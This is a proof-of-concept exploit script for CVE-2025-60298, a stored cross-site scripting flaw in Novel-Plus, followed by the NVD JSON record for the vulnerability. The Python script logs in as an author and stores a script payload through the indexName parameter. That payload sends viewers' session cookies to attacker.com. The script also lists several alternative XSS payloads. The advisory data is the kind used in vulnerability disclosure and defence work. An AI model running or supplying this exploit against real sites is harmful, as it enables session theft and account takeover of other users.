CVE-2025-60298

import requests # CVE-2025-60298 - Novel-Plus Stored XSS PoC # Vulnerability: Stored XSS via /author/updateIndexName endpoint # Parameter: indexName TARGET_URL = "http://target-novel-plus.com" LOGIN_URL = f"{TARGET_URL}/author/login" UPDATE_URL = f"{TARGET_URL}/author/updateIndexName" # Step 1: Login as authenticated author user session = requests.Session() login_data = { "username": "author_user", "password": "author_password" } session.post(LOGIN_URL, data=login_data) # Step 2: Craft malicious XSS payload via indexName parameter # The payload will steal session cookies and send to attacker's server xss_payload = '<script>var i=new Image();i.src="http://attacker.com/steal?c="+document.cookie;</script>' # Step 3: Send the malicious payload to the vulnerable endpoint update_data = { "indexName": xss_payload, # Additional parameters may be required based on the application logic "bookId": "1", "chapterId": "1" } response = session.post(UPDATE_URL, data=update_data) print(f"Status Code: {response.status_code}") print(f"Payload stored successfully. XSS will trigger when victim views the chapter.") # Alternative payload for demonstration: # <script>alert('XSS-CVE-2025-60298')</script> # <img src=x onerror=alert(document.cookie)> # <svg onload=alert(1)>

{"cve": {"id": "CVE-2025-60298", "sourceIdentifier": "[email protected]", "published": "2025-10-08T13:15:34.627", "lastModified": "2025-10-10T16:18:15.537", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Novel-Plus up to 5.2.4 was discovered to contain a Stored Cross-Site Scripting (XSS) vulnerability via the /author/updateIndexName endpoint. This vulnerability allows authenticated attackers to inject malicious JavaScript code through the indexName parameter, which gets stored in the database and executed when other users view the affected book chapter."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:xxyopen:novel-plus:*:*:*:*:*:*:*:*", "versionEndIncluding": "5.2.4", "matchCriteriaId": "D5764449-A5BD-4C80-93FF-6AC581510571"}]}]}], "references": [{"url": "https://github.com/201206030/novel-plus", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://notes.sjtu.edu.cn/s/FB0dX82qf", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://notes.sjtu.edu.cn/s/FB0dX82qf#", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}